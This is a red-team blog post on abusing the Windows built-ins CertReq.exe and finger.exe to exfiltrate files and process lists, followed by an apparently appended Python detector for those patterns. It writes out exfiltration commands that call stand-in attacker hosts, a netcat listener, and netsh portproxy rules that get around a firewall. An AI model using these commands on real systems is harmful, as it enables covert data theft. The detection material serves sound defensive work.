Abusing Living off the Land binaries (Lolbins) for data exfiltration

Nidal Mahmud
Mar 29, 2022

Introduction

Living off the Land binaries (Lolbins) are legitimate binaries that advanced adversaries often misuse to perform actions beyond their original purpose. Their misuse is a sophisticated threat, and detecting it requires advanced tooling. Cybercriminals actively use them to download malware, to establish persistence, for data exfiltration, for lateral movement, and more.

During my red team engagements, I always tend to use uncommon tools, methods, and TTPs to fly under the radar as much as possible.

In this blog I will demonstrate two Windows built-in tools that can exfiltrate small files to an attacker-controlled server.

1. CertReq.exe

CertReq.exe is present on Windows, and its intended use is to assist with the creation and installation of certificates. It is one of the Lolbins most heavily abused by adversaries, because it can perform malicious actions without attracting the attention of security solutions. Adversaries can use CertReq.exe to upload and download small files: it can upload a file via HTTP POST, or download a file via HTTP POST and either save it to disk or display its contents.

Uploading a file to an attacker-controlled server via HTTP POST:

CertReq -Post -config https://attacker.org/ file.txt

Capturing the file using Netcat.

The captured file contains the HTTP request that was made along with the exfiltrated content.

Den Iuzvik developed a threat-hunting Sigma rule that detects possible file uploads and downloads with CertReq.exe:

https://tdm.socprime.com/tdm/info/BBbpPolVZpLp/SJcgLnMBQAH5UgbBoihF/?p=1

2. Finger.exe

Finger.exe is part of the Microsoft Windows operating system and is developed by Microsoft Corporation. It is a system and hidden file, usually located in the %SYSTEM% sub-folder, with a usual size of 9,216 bytes. It creates new records and folders in the Windows registry; check your system performance to rule out application conflicts and system failures. Besides its intended use, it can also be used to exfiltrate data.

For example, to exfiltrate the list of running processes using finger.exe:

On the attacker side, run the following:

touch file; while [ 1 ]; do nc -q 0 -nlvp 79 < file; done >> exfiltrated.txt

On the victim side:

for /f "tokens=1" %i in ('tasklist') do finger %i@attacker-ip

The file exfiltrated.txt now contains the names of all the processes running on the target machine.

Firewall problems

By default finger uses port 79, which is probably blocked by the organization's firewall. If you have administrative privileges you can get around this with netsh portproxy, redirecting the traffic to a port that is allowed outbound, 80 or 443 for example.

netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=79 connectaddress=attacker_finger_server connectport=443

netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=443 connectaddress=127.0.0.1 connectport=79

Now you can finger localhost, and all the traffic will be redirected to your server:

for /f "tokens=1" %i in ('tasklist') do finger %i@127.0.0.1
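On the defensive side, all three behaviours shown above (CertReq -Post uploads, finger.exe contacting a remote host, and netsh portproxy rules being added) leave distinctive process command lines. The following is an added example, not code from the original post or from the Sigma rule linked above: a small Python detector that classifies constructed process-creation events (image path plus command line) against those three patterns. The sample events, the 203.0.113.10 address, and the rule names are assumptions made up for the example.

```python
import re
from os.path import basename

# Detection rules for the Lolbin tricks discussed above.
# Each rule: name, expected image basename, regex applied to the lower-cased command line.
RULES = [
    # CertReq.exe driven with -Post and a -config URL: a file upload over HTTP POST
    ("certreq_http_post", "certreq.exe", re.compile(r"-post\b.*-config\b.*\bhttps?://")),
    # finger.exe is rarely used legitimately; a user@host argument means it is contacting a server
    ("finger_remote_query", "finger.exe", re.compile(r"\bfinger(\.exe)?\s+\S+@\S+")),
    # netsh portproxy rules forward a local listener elsewhere (used to dodge a port 79 block)
    ("netsh_portproxy_add", "netsh.exe", re.compile(r"\bportproxy\s+add\b")),
]


def classify(image, cmdline):
    """Return the names of every rule that fires for one process-creation event."""
    exe = basename(image.replace("\\", "/")).lower()
    line = cmdline.lower()
    return [name for name, wanted_exe, pattern in RULES
            if exe == wanted_exe and pattern.search(line)]


def scan(events):
    """Run every (image, cmdline) event through classify(); keep only the ones that matched."""
    hits = []
    for image, cmdline in events:
        names = classify(image, cmdline)
        if names:
            hits.append((cmdline, names))
    return hits


# Constructed sample events shaped like (image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\certreq.exe",
     "CertReq -Post -config https://attacker.org/ file.txt"),
    ("C:\\Windows\\System32\\certreq.exe",
     "certreq -new request.inf request.req"),              # benign certificate request
    ("C:\\Windows\\System32\\finger.exe",
     "finger svchost.exe@203.0.113.10"),                   # one iteration of the tasklist loop
    ("C:\\Windows\\System32\\finger.exe",
     "finger lsass.exe@127.0.0.1"),                        # loop pointed at the portproxy
    ("C:\\Windows\\System32\\netsh.exe",
     "netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=79 "
     "connectaddress=203.0.113.10 connectport=443"),
    ("C:\\Windows\\System32\\netsh.exe",
     "netsh interface show interface"),                    # benign netsh use
]

if __name__ == "__main__":
    for cmdline, names in scan(SAMPLE_EVENTS):
        print(", ".join(names), "<-", cmdline)
```

Note that the loop form on the victim side produces one finger.exe process per running process, so a burst of finger_remote_query hits from one host is itself a strong signal.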
